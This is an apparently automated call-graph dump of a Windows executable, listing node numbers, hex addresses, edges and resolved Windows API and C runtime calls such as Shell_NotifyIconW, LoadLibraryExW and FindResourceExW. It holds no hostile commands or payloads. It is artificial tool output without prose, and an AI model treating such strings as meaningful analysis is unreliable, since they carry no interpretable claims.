98737 6c581c 98736->98737 98738 6c5810 98736->98738 98737->98738 98739 6c5821 DestroyIcon 98737->98739 98738->98711 98770 7134dd 62 API calls _W_store_winword 98738->98770 98739->98738 98741 6c57fa Mailbox 98740->98741 98742 6c5715 98740->98742 98741->98717 98743 6c162d 59 API calls 98742->98743 98744 6c5723 98743->98744 98745 700c4c LoadStringW 98744->98745 98746 6c5730 98744->98746 98749 700c66 98745->98749 98747 6c1821 59 API calls 98746->98747 98748 6c5745 98747->98748 98751 6c5752 98748->98751 98757 700c74 98748->98757 98750 6c1c9c 59 API calls 98749->98750 98758 6c5778 _memset _wcscpy 98750->98758 98751->98749 98752 6c5760 98751->98752 98753 6c1900 59 API calls 98752->98753 98754 6c576a 98753->98754 98755 6c17e0 59 API calls 98754->98755 98755->98758 98756 700cb7 Mailbox 98772 6d38c8 83 API calls 3 library calls 98756->98772 98757->98756 98757->98758 98759 6c1207 59 API calls 98757->98759 98760 6c57e0 Shell_NotifyIconW 98758->98760 98761 700c9e 98759->98761 98760->98741 98771 710252 60 API calls Mailbox 98761->98771 98764 700cd6 98766 6c1900 59 API calls 98764->98766 98765 700ca9 98767 6c17e0 59 API calls 98765->98767 98768 700ce7 98766->98768 98767->98756 98769 6c1900 59 API calls 98768->98769 98769->98758 98770->98711 98771->98765 98772->98764 98773->98723 98775 6b4d37 84 API calls 98774->98775 98776 72d203 98775->98776 98781 72d24a Mailbox 98776->98781 98812 72de8e 98776->98812 98778 72d617 98862 72dfb1 92 API calls Mailbox 98778->98862 98781->98263 98782 72d29b Mailbox 98782->98781 98785 6b4d37 84 API calls 98782->98785 98799 72d4a2 98782->98799 98844 71fc0d 59 API calls 2 library calls 98782->98844 98845 72d6c8 61 API calls 2 library calls 98782->98845 98783 72d626 98784 72d4b0 98783->98784 98786 72d632 98783->98786 98825 72d057 98784->98825 98785->98782 98786->98781 98791 72d4e9 98840 6d0e38 98791->98840 98794 72d503 98846 71a48d 89 API calls 4 library calls 98794->98846 98795 72d51c 98847 6b47be 98795->98847 98798 72d50e GetCurrentProcess TerminateProcess 98798->98795 98799->98778 98799->98784 98804 72d68d 98804->98781 98808 72d6a1 FreeLibrary 98804->98808 98805 72d554 98859 72dd32 107 API calls _free 98805->98859 98808->98781 98810 72d565 98810->98804 98860 6b4230 59 API calls Mailbox 98810->98860 98861 6b523c 59 API calls 98810->98861 98863 72dd32 107 API calls _free 98810->98863 98813 6c1aa4 59 API calls 98812->98813 98814 72dea9 CharLowerBuffW 98813->98814 98864 70f903 98814->98864 98818 6c1207 59 API calls 98819 72dee2 98818->98819 98820 6c1462 59 API calls 98819->98820 98821 72def9 98820->98821 98823 6c1981 59 API calls 98821->98823 98822 72df41 Mailbox 98822->98782 98824 72df05 Mailbox 98823->98824 98824->98822 98871 72d6c8 61 API calls 2 library calls 98824->98871 98826 72d072 98825->98826 98830 72d0c7 98825->98830 98827 6d0fe6 Mailbox 59 API calls 98826->98827 98829 72d094 98827->98829 98828 6d0fe6 Mailbox 59 API calls 98828->98829 98829->98828 98829->98830 98831 72e139 98830->98831 98832 72e362 Mailbox 98831->98832 98839 72e15c _strcat _wcscpy __wsetenvp 98831->98839 98832->98791 98833 6b50d5 59 API calls 98833->98839 98834 6b502b 59 API calls 98834->98839 98835 6b5087 59 API calls 98835->98839 98836 6b4d37 84 API calls 98836->98839 98837 6d593c 58 API calls __crtLCMapStringA_stat 98837->98839 98839->98832 98839->98833 98839->98834 98839->98835 98839->98836 98839->98837 98874 715e42 61 API calls 2 library calls 98839->98874 98841 6d0e4d 98840->98841 98842 6d0ee5 Sleep 98841->98842 98843 6d0eb3 98841->98843 98842->98843 98843->98794 98843->98795 98844->98782 98845->98782 98846->98798 98848 6b47c6 98847->98848 98849 6d0fe6 Mailbox 59 API calls 98848->98849 98850 6b47d4 98849->98850 98851 6b47e0 98850->98851 98875 6b46ec 59 API calls Mailbox 98850->98875 98853 6b4540 98851->98853 98876 6b4650 98853->98876 98855 6d0fe6 Mailbox 59 API calls 98857 6b45eb 98855->98857 98856 6b454f 98856->98855 98856->98857 98857->98810 98858 6b4230 59 API calls Mailbox 98857->98858 98858->98805 98859->98810 98860->98810 98861->98810 98862->98783 98863->98810 98865 70f92e __wsetenvp 98864->98865 98866 70f96d 98865->98866 98869 70f963 98865->98869 98870 70fa14 98865->98870 98866->98818 98866->98824 98869->98866 98872 6c14db 61 API calls 98869->98872 98870->98866 98873 6c14db 61 API calls 98870->98873 98871->98822 98872->98869 98873->98870 98874->98839 98875->98851 98877 6b4659 Mailbox 98876->98877 98878 6ed6ec 98877->98878 98883 6b4663 98877->98883 98879 6d0fe6 Mailbox 59 API calls 98878->98879 98881 6ed6f8 98879->98881 98880 6b466a 98880->98856 98882 6b5190 Mailbox 59 API calls 98882->98883 98883->98880 98883->98882 98884->98278 98885->98276 98887 714cf0 98886->98887 98888 714d09 98886->98888 98887->98888 98891 714d0f 98887->98891 98893 6d385c GetStringTypeW _iswctype 98887->98893 98894 6d37c3 59 API calls __wcstoi64 98888->98894 98891->98308 98892->98308 98893->98887 98894->98891 98895->98148 98896 6d7e83 98897 6d7e8f _wprintf 98896->98897 98933 6da038 GetStartupInfoW 98897->98933 98900 6d7e94 98935 6d8dac GetProcessHeap 98900->98935 98901 6d7eec 98902 6d7ef7 98901->98902 99018 6d7fd3 58 API calls 3 library calls 98901->99018 98936 6d9d16 98902->98936 98905 6d7efd 98907 6d7f08 __RTC_Initialize 98905->98907 99019 6d7fd3 58 API calls 3 library calls 98905->99019 98957 6dd802 98907->98957 98909 6d7f17 98910 6d7f23 GetCommandLineW 98909->98910 99020 6d7fd3 58 API calls 3 library calls 98909->99020 98976 6e5153 GetEnvironmentStringsW 98910->98976 98914 6d7f22 98914->98910 98916 6d7f3d 98917 6d7f48 98916->98917 99021 6d32e5 58 API calls 3 library calls 98916->99021 98986 6e4f88 98917->98986 98920 6d7f4e 98921 6d7f59 98920->98921 99022 6d32e5 58 API calls 3 library calls 98920->99022 99000 6d331f 98921->99000 98924 6d7f61 98925 6d7f6c __wwincmdln 98924->98925 99023 6d32e5 58 API calls 3 library calls 98924->99023 99006 6c5f8b 98925->99006 98928 6d7f80 98929 6d7f8f 98928->98929 99024 6d3588 58 API calls _doexit 98928->99024 99025 6d3310 58 API calls _doexit 98929->99025 98932 6d7f94 _wprintf 98934 6da04e 98933->98934 98934->98900 98935->98901 99026 6d33b7 36 API calls 2 library calls 98936->99026 98938 6d9d1b 99027 6d9f6c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 98938->99027 98940 6d9d20 98941 6d9d24 98940->98941 99029 6d9fba TlsAlloc 98940->99029 99028 6d9d8c 61 API calls 2 library calls 98941->99028 98944 6d9d29 98944->98905 98945 6d9d36 98945->98941 98946 6d9d41 98945->98946 99030 6d8a05 98946->99030 98949 6d9d83 99038 6d9d8c 61 API calls 2 library calls 98949->99038 98952 6d9d62 98952->98949 98954 6d9d68 98952->98954 98953 6d9d88 98953->98905 99037 6d9c63 58 API calls 4 library calls 98954->99037 98956 6d9d70 GetCurrentThreadId 98956->98905 98958 6dd80e _wprintf 98957->98958 98959 6d9e3b __lock 58 API calls 98958->98959 98960 6dd815 98959->98960 98961 6d8a05 __calloc_crt 58 API calls 98960->98961 98963 6dd826 98961->98963 98962 6dd891 GetStartupInfoW 98970 6dd8a6 98962->98970 98973 6dd9d5 98962->98973 98963->98962 98964 6dd831 _wprintf @_EH4_CallFilterFunc@8 98963->98964 98964->98909 98965 6dda9d 99052 6ddaad LeaveCriticalSection _doexit 98965->99052 98967 6d8a05 __calloc_crt 58 API calls 98967->98970 98968 6dda22 GetStdHandle 98968->98973 98969 6dda35 GetFileType 98969->98973 98970->98967 98972 6dd8f4 98970->98972 98970->98973 98971 6dd928 GetFileType 98971->98972 98972->98971 98972->98973 99050 6da05b InitializeCriticalSectionAndSpinCount 98972->99050 98973->98965 98973->98968 98973->98969 99051 6da05b InitializeCriticalSectionAndSpinCount 98973->99051 98977 6d7f33 98976->98977 98978 6e5164 98976->98978 98982 6e4d4b GetModuleFileNameW 98977->98982 99053 6d8a4d 58 API calls 2 library calls 98978->99053 98980 6e518a _memmove 98981 6e51a0 FreeEnvironmentStringsW 98980->98981 98981->98977 98983 6e4d7f _wparse_cmdline 98982->98983 98985 6e4dbf _wparse_cmdline 98983->98985 99054 6d8a4d 58 API calls 2 library calls 98983->99054 98985->98916 98987 6e4fa1 __wsetenvp 98986->98987 98991 6e4f99 98986->98991 98988 6d8a05 __calloc_crt 58 API calls 98987->98988 98996 6e4fca __wsetenvp 98988->98996 98989 6e5021 98990 6d2f85 _free 58 API calls 98989->98990 98990->98991 98991->98920 98992 6d8a05 __calloc_crt 58 API calls 98992->98996 98993 6e5046 98995 6d2f85 _free 58 API calls 98993->98995 98995->98991 98996->98989 98996->98991 98996->98992 98996->98993 98997 6e505d 98996->98997 99055 6e4837 58 API calls wcstoxq 98996->99055 99056 6d8ff6 IsProcessorFeaturePresent 98997->99056 98999 6e5069 98999->98920 99002 6d332b __IsNonwritableInCurrentImage 99000->99002 99079 6da701 99002->99079 99003 6d3349 __initterm_e 99004 6d2f70 __cinit 67 API calls 99003->99004 99005 6d3368 __cinit __IsNonwritableInCurrentImage 99003->99005 99004->99005 99005->98924 99007 6c5fa5 99006->99007 99017 6c6044 99006->99017 99008 6c5fdf IsThemeActive 99007->99008 99082 6d359c 99008->99082 99012 6c600b 99094 6c5f00 SystemParametersInfoW SystemParametersInfoW 99012->99094 99014 6c6017 99095 6c5240 99014->99095 99016 6c601f SystemParametersInfoW 99016->99017 99017->98928 99018->98902 99019->98907 99020->98914 99024->98929 99025->98932 99026->98938 99027->98940 99028->98944 99029->98945 99032 6d8a0c 99030->99032 99033 6d8a47 99032->99033 99035 6d8a2a 99032->99035 99039 6e5426 99032->99039 99033->98949 99036 6da016 TlsSetValue 99033->99036 99035->99032 99035->99033 99047 6da362 Sleep 99035->99047 99036->98952 99037->98956 99038->98953 99040 6e544c 99039->99040 99041 6e5431 99039->99041 99044 6e545c HeapAlloc 99040->99044 99045 6e5442 99040->99045 99049 6d35d1 DecodePointer 99040->99049 99041->99040 99042 6e543d 99041->99042 99048 6d8d58 58 API calls __getptd_noexit 99042->99048 99044->99040 99044->99045 99045->99032 99047->99035 99048->99045 99049->99040 99050->98972 99051->98973 99052->98964 99053->98980 99054->98985 99055->98996 99057 6d9001 99056->99057 99062 6d8e89 99057->99062 99061 6d901c 99061->98999 99063 6d8ea3 _memset __call_reportfault 99062->99063 99064 6d8ec3 IsDebuggerPresent 99063->99064 99070 6da385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99064->99070 99067 6d8f87 __call_reportfault 99071 6dc826 99067->99071 99068 6d8faa 99069 6da370 GetCurrentProcess TerminateProcess 99068->99069 99069->99061 99070->99067 99072 6dc82e 99071->99072 99073 6dc830 IsProcessorFeaturePresent 99071->99073 99072->99068 99075 6e5b3a 99073->99075 99078 6e5ae9 5 API calls 2 library calls 99075->99078 99077 6e5c1d 99077->99068 99078->99077 99080 6da704 EncodePointer 99079->99080 99080->99080 99081 6da71e 99080->99081 99081->99003 99083 6d9e3b __lock 58 API calls 99082->99083 99084 6d35a7 DecodePointer EncodePointer 99083->99084 99147 6d9fa5 LeaveCriticalSection 99084->99147 99086 6c6004 99087 6d3604 99086->99087 99088 6d360e 99087->99088 99089 6d3628 99087->99089 99088->99089 99148 6d8d58 58 API calls __getptd_noexit 99088->99148 99089->99012 99091 6d3618 99149 6d8fe6 9 API calls wcstoxq 99091->99149 99093 6d3623 99093->99012 99094->99014 99096 6c524d __ftell_nolock 99095->99096 99097 6c1207 59 API calls 99096->99097 99098 6c5258 GetCurrentDirectoryW 99097->99098 99150 6c4ec8 99098->99150 99100 6c527e IsDebuggerPresent 99101 6c528c 99100->99101 99102 700b21 MessageBoxA 99100->99102 99103 700b39 99101->99103 99104 6c52a0 99101->99104 99102->99103 99258 6c314d 59 API calls Mailbox 99103->99258 99218 6c31bf 99104->99218 99108 700b49 99114 700b5f SetCurrentDirectoryW 99108->99114 99113 6c536c Mailbox 99113->99016 99114->99113 99147->99086 99148->99091 99149->99093 99151 6c1207 59 API calls 99150->99151 99152 6c4ede 99151->99152 99267 6c5420 99152->99267 99154 6c4efc 99155 6c19e1 59 API calls 99154->99155 99156 6c4f10 99155->99156 99157 6c1c9c 59 API calls 99156->99157 99158 6c4f1b 99157->99158 99281 6b477a 99158->99281 99161 6c1a36 59 API calls 99162 6c4f34 99161->99162 99163 6b39be 68 API calls 99162->99163 99164 6c4f44 Mailbox 99163->99164 99165 6c1a36 59 API calls 99164->99165 99166 6c4f68 99165->99166 99167 6b39be 68 API calls 99166->99167 99168 6c4f77 Mailbox 99167->99168 99169 6c1207 59 API calls 99168->99169 99170 6c4f94 99169->99170 99284 6c55bc 99170->99284 99173 6d312d _W_store_winword 60 API calls 99174 6c4fae 99173->99174 99175 700a54 99174->99175 99176 6c4fb8 99174->99176 99177 6c55bc 59 API calls 99175->99177 99178 6d312d _W_store_winword 60 API calls 99176->99178 99179 700a68 99177->99179 99180 6c4fc3 99178->99180 99182 6c55bc 59 API calls 99179->99182 99180->99179 99181 6c4fcd 99180->99181 99183 6d312d _W_store_winword 60 API calls 99181->99183 99184 700a84 99182->99184 99185 6c4fd8 99183->99185 99187 6d00cf 61 API calls 99184->99187 99185->99184 99186 6c4fe2 99185->99186 99188 6d312d _W_store_winword 60 API calls 99186->99188 99189 700aa7 99187->99189 99190 6c4fed 99188->99190 99191 6c55bc 59 API calls 99189->99191 99194 6c4ff7 99190->99194 99207 700ad0 99190->99207 99192 700ab3 99191->99192 99196 6c1c9c 59 API calls 99192->99196 99193 6c501b 99201 6b47be 59 API calls 99193->99201 99194->99193 99197 6c1c9c 59 API calls 99194->99197 99195 6c55bc 59 API calls 99198 700aee 99195->99198 99199 700ac1 99196->99199 99200 6c500e 99197->99200 99202 6c1c9c 59 API calls 99198->99202 99203 6c55bc 59 API calls 99199->99203 99204 6c55bc 59 API calls 99200->99204 99205 6c502a 99201->99205 99206 700afc 99202->99206 99203->99207 99204->99193 99208 6b4540 59 API calls 99205->99208 99209 6c55bc 59 API calls 99206->99209 99207->99195 99210 6c5038 99208->99210 99211 700b0b 99209->99211 99290 6b43d0 99210->99290 99211->99211 99213 6b477a 59 API calls 99215 6c5055 99213->99215 99214 6b43d0 59 API calls 99214->99215 99215->99213 99215->99214 99216 6c55bc 59 API calls 99215->99216 99217 6c509b Mailbox 99215->99217 99216->99215 99217->99100 99219 6c31cc __ftell_nolock 99218->99219 99220 700314 _memset 99219->99220 99221 6c31e5 99219->99221 99223 700330 GetOpenFileNameW 99220->99223 99222 6d0284 60 API calls 99221->99222 99224 6c31ee 99222->99224 99225 70037f 99223->99225 99307 6d09c5 99224->99307 99227 6c1821 59 API calls 99225->99227 99229 700394 99227->99229 99229->99229 99231 6c3203 99325 6c278a 99231->99325 99258->99108 99268 6c542d __ftell_nolock 99267->99268 99269 6c1821 59 API calls 99268->99269 99274 6c5590 Mailbox 99268->99274 99271 6c545f 99269->99271 99270 6c1609 59 API calls 99270->99271 99271->99270 99279 6c5495 Mailbox 99271->99279 99272 6c1609 59 API calls 99272->99279 99273 6c5563 99273->99274 99275 6c1a36 59 API calls 99273->99275 99274->99154 99276 6c5584 99275->99276 99278 6c4c94 59 API calls 99276->99278 99277 6c1a36 59 API calls 99277->99279 99278->99274 99279->99272 99279->99273 99279->99274 99279->99277 99299 6c4c94 99279->99299 99282 6d0fe6 Mailbox 59 API calls 99281->99282 99283 6b4787 99282->99283 99283->99161 99285 6c55df 99284->99285 99286 6c55c6 99284->99286 99288 6c1821 59 API calls 99285->99288 99287 6c1c9c 59 API calls 99286->99287 99289 6c4fa0 99287->99289 99288->99289 99289->99173 99291 6ed6c9 99290->99291 99297 6b43e7 99290->99297 99291->99297 99306 6b40cb 59 API calls Mailbox 99291->99306 99293 6b44e8 99295 6d0fe6 Mailbox 59 API calls 99293->99295 99294 6b4530 99305 6b523c 59 API calls 99294->99305 99298 6b44ef 99295->99298 99297->99293 99297->99294 99297->99298 99298->99215 99300 6c4ca2 99299->99300 99304 6c4cc4 _memmove 99299->99304 99302 6d0fe6 Mailbox 59 API calls 99300->99302 99301 6d0fe6 Mailbox 59 API calls 99303 6c4cd8 99301->99303 99302->99304 99303->99279 99304->99301 99305->99298 99306->99297 99308 6e1b70 __ftell_nolock 99307->99308 99309 6d09d2 GetLongPathNameW 99308->99309 99310 6c1821 59 API calls 99309->99310 99311 6c31f7 99310->99311 99312 6c2f3d 99311->99312 99313 6c1207 59 API calls 99312->99313 99314 6c2f4f 99313->99314 99315 6d0284 60 API calls 99314->99315 99316 6c2f5a 99315->99316 99317 6c2f65 99316->99317 99321 700177 99316->99321 99318 6c4c94 59 API calls 99317->99318 99320 6c2f71 99318->99320 99359 6b1307 99320->99359 99323 700191 99321->99323 99365 6c151f 61 API calls 99321->99365 99324 6c2f84 Mailbox 99324->99231 99366 6c49c2 99325->99366 99328 6ff8d6 99482 719b16 122 API calls 2 library calls 99328->99482 99329 6c49c2 136 API calls 99331 6c27c3 99329->99331 99331->99328 99333 6c27cb 99331->99333 99332 6ff8e7 99334 6ff8eb 99332->99334 99335 6ff908 99332->99335 99337 6c27d7 99333->99337 99338 6ff8f3 99333->99338 99483 6c4a2f 99334->99483 99336 6d0fe6 Mailbox 59 API calls 99335->99336 99358 6ff94d Mailbox 99336->99358 99390 6c29be 99337->99390 99489 7147e8 90 API calls _wprintf 99338->99489 99342 6ff901 99342->99335 99360 6b1319 99359->99360 99364 6b1338 _memmove 99359->99364 99362 6d0fe6 Mailbox 59 API calls 99360->99362 99361 6d0fe6 Mailbox 59 API calls 99363 6b134f 99361->99363 99362->99364 99363->99324 99364->99361 99365->99321 99500 6c4b29 99366->99500 99371 6c49ed LoadLibraryExW 99510 6c4ade 99371->99510 99372 7008bb 99374 6c4a2f 84 API calls 99372->99374 99376 7008c2 99374->99376 99378 6c4ade 3 API calls 99376->99378 99379 7008ca 99378->99379 99536 6c4ab2 99379->99536 99380 6c4a14 99380->99379 99381 6c4a20 99380->99381 99383 6c4a2f 84 API calls 99381->99383 99385 6c27af 99383->99385 99385->99328 99385->99329 99387 7008f1 99542 6c4a6e 99387->99542 99389 7008fe 99391 6ffd14 99390->99391 99392 6c29e7 99390->99392 99394 6c3df7 60 API calls 99392->99394 99482->99332 99484 6c4a39 99483->99484 99486 6c4a40 99483->99486 100039 6d55c6 99484->100039 99489->99342 99547 6c4b77 99500->99547 99503 6c4b77 2 API calls 99506 6c4b50 99503->99506 99504 6c49d4 99507 6d547b 99504->99507 99505 6c4b60 FreeLibrary 99505->99504 99506->99504 99506->99505 99551 6d5490 99507->99551 99509 6c49e1 99509->99371 99509->99372 99632 6c4baa 99510->99632 99513 6c4b03 99515 6c4a05 99513->99515 99516 6c4b15 FreeLibrary 99513->99516 99514 6c4baa 2 API calls 99514->99513 99517 6c48b0 99515->99517 99516->99515 99518 6d0fe6 Mailbox 59 API calls 99517->99518 99519 6c48c5 99518->99519 99520 6c433f 59 API calls 99519->99520 99521 6c48d1 _memmove 99520->99521 99522 6c490c 99521->99522 99523 70080a 99521->99523 99524 6c4a6e 69 API calls 99522->99524 99525 700817 99523->99525 99641 719ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99523->99641 99528 6c4915 99524->99528 99642 719f5e 95 API calls 99525->99642 99529 700859 99528->99529 99530 6c4ab2 74 API calls 99528->99530 99535 6c49a0 99528->99535 99636 6c4a8c 99528->99636 99531 6c4a8c 85 API calls 99529->99531 99530->99528 99532 700890 99531->99532 99534 6c4ab2 74 API calls 99532->99534 99534->99535 99535->99380 99537 700945 99536->99537 99538 6c4ac4 99536->99538 99748 6d5802 99538->99748 99541 7196c4 GetSystemTimeAsFileTime 99541->99387 99543 6c4a7d 99542->99543 99544 700908 99542->99544 99854 6d5e80 99543->99854 99546 6c4a85 99546->99389 99548 6c4b44 99547->99548 99549 6c4b80 LoadLibraryA 99547->99549 99548->99503 99548->99506 99549->99548 99550 6c4b91 GetProcAddress 99549->99550 99550->99548 99552 6d549c _wprintf 99551->99552 99553 6d54af 99552->99553 99555 6d54e0 99552->99555 99600 6d8d58 58 API calls __getptd_noexit 99553->99600 99570 6e0718 99555->99570 99556 6d54b4 99601 6d8fe6 9 API calls wcstoxq 99556->99601 99559 6d54e5 99560 6d54ee 99559->99560 99561 6d54fb 99559->99561 99602 6d8d58 58 API calls __getptd_noexit 99560->99602 99563 6d5525 99561->99563 99564 6d5505 99561->99564 99585 6e0837 99563->99585 99603 6d8d58 58 API calls __getptd_noexit 99564->99603 99565 6d54bf _wprintf @_EH4_CallFilterFunc@8 99565->99509 99571 6e0724 _wprintf 99570->99571 99572 6d9e3b __lock 58 API calls 99571->99572 99583 6e0732 99572->99583 99573 6e07a6 99605 6e082e 99573->99605 99574 6e07ad 99610 6d8a4d 58 API calls 2 library calls 99574->99610 99577 6e0823 _wprintf 99577->99559 99578 6e07b4 99578->99573 99611 6da05b InitializeCriticalSectionAndSpinCount 99578->99611 99580 6d9ec3 __mtinitlocknum 58 API calls 99580->99583 99582 6e07da EnterCriticalSection 99582->99573 99583->99573 99583->99574 99583->99580 99608 6d6e7d 59 API calls __lock 99583->99608 99609 6d6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 99583->99609 99586 6e0857 __wopenfile 99585->99586 99587 6e0871 99586->99587 99599 6e0a2c 99586->99599 99618 6d39fb 60 API calls 2 library calls 99586->99618 99616 6d8d58 58 API calls __getptd_noexit 99587->99616 99589 6e0876 99617 6d8fe6 9 API calls wcstoxq 99589->99617 99591 6d5530 99604 6d5552 LeaveCriticalSection LeaveCriticalSection __wfsopen 99591->99604 99592 6e0a8f 99613 6e87d1 99592->99613 99595 6e0a25 99595->99599 99619 6d39fb 60 API calls 2 library calls 99595->99619 99597 6e0a44 99597->99599 99620 6d39fb 60 API calls 2 library calls 99597->99620 99599->99587 99599->99592 99600->99556 99601->99565 99602->99565 99603->99565 99604->99565 99612 6d9fa5 LeaveCriticalSection 99605->99612 99607 6e0835 99607->99577 99608->99583 99609->99583 99610->99578 99611->99582 99612->99607 99621 6e7fb5 99613->99621 99615 6e87ea 99615->99591 99616->99589 99617->99591 99618->99595 99619->99597 99620->99599 99622 6e7fc1 _wprintf 99621->99622 99623 6e7fd7 99622->99623 99626 6e800d 99622->99626 99624 6d8d58 wcstoxq 58 API calls 99623->99624 99625 6e7fdc 99624->99625 99627 6d8fe6 wcstoxq 9 API calls 99625->99627 99628 6e807e __wsopen_nolock 109 API calls 99626->99628 99631 6e7fe6 _wprintf 99627->99631 99629 6e8029 99628->99629 99630 6e8052 __wsopen_helper LeaveCriticalSection 99629->99630 99630->99631 99631->99615 99633 6c4af7 99632->99633 99634 6c4bb3 LoadLibraryA 99632->99634 99633->99513 99633->99514 99634->99633 99635 6c4bc4 GetProcAddress 99634->99635 99635->99633 99637 700923 99636->99637 99638 6c4a9b 99636->99638 99643 6d5a6d 99638->99643 99640 6c4aa9 99640->99528 99641->99525 99642->99528 99644 6d5a79 _wprintf 99643->99644 99645 6d5a8b 99644->99645 99647 6d5ab1 99644->99647 99674 6d8d58 58 API calls __getptd_noexit 99645->99674 99656 6d6e3e 99647->99656 99648 6d5a90 99675 6d8fe6 9 API calls wcstoxq 99648->99675 99653 6d5a9b _wprintf 99653->99640 99657 6d6e4e 99656->99657 99658 6d6e70 EnterCriticalSection 99656->99658 99657->99658 99659 6d6e56 99657->99659 99661 6d5ab7 99658->99661 99660 6d9e3b __lock 58 API calls 99659->99660 99660->99661 99662 6d59de 99661->99662 99663 6d59fc 99662->99663 99664 6d59ec 99662->99664 99667 6d5a12 99663->99667 99677 6d5af0 99663->99677 99747 6d8d58 58 API calls __getptd_noexit 99664->99747 99706 6d4c5d 99667->99706 99668 6d59f1 99674->99648 99675->99653 99678 6d5afd __ftell_nolock 99677->99678 99747->99668 99751 6d581d 99748->99751 99750 6c4ad5 99750->99541 99752 6d5829 _wprintf 99751->99752 99753 6d586c 99752->99753 99754 6d5864 _wprintf 99752->99754 99758 6d583f _memset 99752->99758 99755 6d6e3e __lock_file 59 API calls 99753->99755 99754->99750 99757 6d5872 99755->99757 99764 6d563d 99757->99764 99778 6d8d58 58 API calls __getptd_noexit 99758->99778 99759 6d5859 99779 6d8fe6 9 API calls wcstoxq 99759->99779 99765 6d5658 _memset 99764->99765 99770 6d5673 99764->99770 99766 6d5663 99765->99766 99765->99770 99775 6d56b3 99765->99775 99849 6d8d58 58 API calls __getptd_noexit 99766->99849 99768 6d5668 99850 6d8fe6 9 API calls wcstoxq 99768->99850 99780 6d58a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 99770->99780 99772 6d57c4 _memset 99853 6d8d58 58 API calls __getptd_noexit 99772->99853 99773 6d4906 _fprintf 58 API calls 99773->99775 99775->99770 99775->99772 99775->99773 99781 6e108b 99775->99781 99851 6e0ef8 58 API calls 3 library calls 99775->99851 99852 6e0dd7 72 API calls 4 library calls 99775->99852 99778->99759 99779->99754 99780->99754 99782 6e10ac 99781->99782 99783 6e10c3 99781->99783 99785 6d8d24 __wsopen_nolock 58 API calls 99782->99785 99784 6e17fb 99783->99784 99789 6e10fd 99783->99789 99786 6d8d24 __wsopen_nolock 58 API calls 99784->99786 99787 6e10b1 99785->99787 99790 6e1800 99786->99790 99788 6d8d58 wcstoxq 58 API calls 99787->99788 99829 6e10b8 99788->99829 99791 6e1105 99789->99791 99797 6e111c 99789->99797 99792 6d8d58 wcstoxq 58 API calls 99790->99792 99793 6d8d24 __wsopen_nolock 58 API calls 99791->99793 99794 6e1111 99792->99794 99795 6e110a 99793->99795 99796 6d8fe6 wcstoxq 9 API calls 99794->99796 99801 6d8d58 wcstoxq 58 API calls 99795->99801 99796->99829 99798 6e1131 99797->99798 99800 6e114b 99797->99800 99802 6e1169 99797->99802 99797->99829 99799 6d8d24 __wsopen_nolock 58 API calls 99798->99799 99799->99795 99800->99798 99805 6e1156 99800->99805 99801->99794 99803 6d8a4d __malloc_crt 58 API calls 99802->99803 99806 6e1179 99803->99806 99804 6e5e9b __read_nolock 58 API calls 99807 6e126a 99804->99807 99805->99804 99808 6e119c 99806->99808 99809 6e1181 99806->99809 99810 6e12e3 ReadFile 99807->99810 99813 6e1280 GetConsoleMode 99807->99813 99811 6e1af1 __lseeki64_nolock 60 API calls 99808->99811 99812 6d8d58 wcstoxq 58 API calls 99809->99812 99814 6e1305 99810->99814 99815 6e17c3 GetLastError 99810->99815 99811->99805 99816 6e1186 99812->99816 99820 6e1294 99813->99820 99821 6e12e0 99813->99821 99814->99815 99820->99821 99821->99810 99829->99775 99849->99768 99850->99770 99851->99775 99852->99775 99853->99768 99855 6d5e8c _wprintf 99854->99855 99856 6d5e9e 99855->99856 99857 6d5eb3 99855->99857 99867 6d8d58 58 API calls __getptd_noexit 99856->99867 99859 6d6e3e __lock_file 59 API calls 99857->99859 99861 6d5eb9 99859->99861 99860 6d5ea3 99868 6d8fe6 9 API calls wcstoxq 99860->99868 99863 6d5af0 __ftell_nolock 67 API calls 99861->99863 99864 6d5ec4 99863->99864 99869 6d5ee4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99864->99869 99866 6d5eae _wprintf 99866->99546 99867->99860 99868->99866 99869->99866 100211 6c4d83 100212 6c4dba 100211->100212 100213 6c4dd8 100212->100213 100214 6c4e37 100212->100214 100251 6c4e35 100212->100251 100218 6c4ead PostQuitMessage 100213->100218 100219 6c4de5 100213->100219 100216 6c4e3d 100214->100216 100217 7009c2 100214->100217 100215 6c4e1a DefWindowProcW 100220 6c4e28 100215->100220 100221 6c4e65 SetTimer RegisterWindowMessageW 100216->100221 100222 6c4e42 100216->100222 100266 6bc460 10 API calls Mailbox 100217->100266 100218->100220 100223 700a35 100219->100223 100224 6c4df0 100219->100224 100221->100220 100228 6c4e8e CreatePopupMenu 100221->100228 100226 700965 100222->100226 100227 6c4e49 KillTimer 100222->100227 100269 712cce 97 API calls _memset 100223->100269 100229 6c4df8 100224->100229 100230 6c4eb7 100224->100230 100234 70096a 100226->100234 100235 70099e MoveWindow 100226->100235 100236 6c5ac3 Shell_NotifyIconW 100227->100236 100228->100220 100237 700a1a 100229->100237 100238 6c4e03 100229->100238 100256 6c5b29 100230->100256 100232 7009e9 100267 6bc483 291 API calls Mailbox 100232->100267 100241 70098d SetFocus 100234->100241 100242 70096e 100234->100242 100235->100220 100243 6c4e5c 100236->100243 100237->100215 100268 708854 59 API calls Mailbox 100237->100268 100244 6c4e0e 100238->100244 100245 6c4e9b 100238->100245 100239 700a47 100239->100215 100239->100220 100241->100220 100242->100244 100246 700977 100242->100246 100263 6b34e4 DeleteObject DestroyWindow Mailbox 100243->100263 100244->100215 100253 6c5ac3 Shell_NotifyIconW 100244->100253 100264 6c5bd7 107 API calls _memset 100245->100264 100265 6bc460 10 API calls Mailbox 100246->100265 100251->100215 100252 6c4eab 100252->100220 100254 700a0e 100253->100254 100255 6c59d3 94 API calls 100254->100255 100255->100251 100257 6c5b40 _memset 100256->100257 100258 6c5bc2 100256->100258 100259 6c56f8 87 API calls 100257->100259 100258->100220 100261 6c5b67 100259->100261 100260 6c5bab KillTimer SetTimer 100260->100258 100261->100260 100262 700d6e Shell_NotifyIconW 100261->100262 100262->100260 100263->100220 100264->100252 100265->100220 100266->100232 100267->100244 100268->100251 100269->100239 100270 6b107d 100275 6c2fc5 100270->100275 100272 6b108c 100273 6d2f70 __cinit 67 API calls 100272->100273 100274 6b1096 100273->100274 100276 6c2fd5 __ftell_nolock 100275->100276 100277 6c1207 59 API calls 100276->100277 100278 6c308b 100277->100278 100279 6d00cf 61 API calls 